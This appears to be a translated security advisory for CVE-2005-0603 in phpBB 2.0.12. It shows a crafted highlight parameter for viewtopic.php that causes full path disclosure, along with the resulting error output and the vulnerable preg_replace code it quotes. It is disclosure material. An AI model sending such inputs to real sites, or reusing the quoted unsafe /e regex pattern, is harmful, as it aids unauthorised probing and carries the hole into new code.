
Эксплойт доказательства концепции для CVE-2005-0603, демонстрирующий уязвимость раскрытия полного пути в phpBB 2.0.12 через подготовленное регулярное выражение в параметре highlight файла viewtopic.php.
Программа: phpBB 2.0.12 Домашняя страница: http://www.phpbb.com Уязвимые версии: phpBB 2.0.12 и более ранние версии Риск: Низкий риск!! Воздействие: Раскрытие полного пути
-==phpBB 2.0.12 Раскрытие полного пути==-
phpBB — это мощная, полностью масштабируемая и легко настраиваемая пакетная система досок объявлений с открытым исходным кодом. phpBB имеет удобный интерфейс, простую и понятную панель администратора и полезный FAQ. Основанный на мощном языке сервера PHP и вашем выборе баз данных MySQL, MS-SQL, PostgreSQL или Access/ODBC, phpBB является идеальным бесплатным решением для сообществ для всех веб-сайтов.
localhost и многие форумы
phpBB/viewtopic.php?p=6&highlight=[HaCkZaTaN]
Это выдаст что-то вроде этого.
Warning: Compilation failed: missing terminating ] for character class at offset 20 in /home/nst/forum/viewtopic.php(1110) : regexp code on line 1
Это приведёт к раскрытию полного пути, а также я заметил, что сообщения изменяются — ничего не отображается. В переменной HighLight
Вот проблема: -----[ Начало уязвимого кода ] ------------------------------------
1106: if ($highlight_match)
1107: {
1108: // Это было бесстыдно 'позаимствовано' от volker at multiartstudio dot de
1109: // через аннотированное руководство php.net
1110: $message = str_replace('"', '"',
substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#\b(" .
$highlight_match . ")\b#i', '<span style="color:#" . $theme['fontcolor3'] .
"">\\1', '\0')", '>' . $message . '<'), 1, -1)); 1111: }
-----[ Конец уязвимого кода ] ------------------------------------ Не заимствуйте вещи lol.
Пока нет xD
Пока нет xD
OK, ещё кое-что, что я заметил, — это в php.ini
magic_quotes_gpc = On magic_quotes_sybase = Off
Вы должны включить оба этих параметра
http://neossecurity.net/Advisories/Advisory-06.txt
Обнаружено: HaCkZaTaN [email protected]
[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/
Есть вопросы? http://neossecurity.net/
Irc.InfoGroup.cl #neosecurityteam
Paisterist
T0wn3r
Heap
Nitrous
CrashCool
eL_mEsIaS
Makoki
And my Colombian people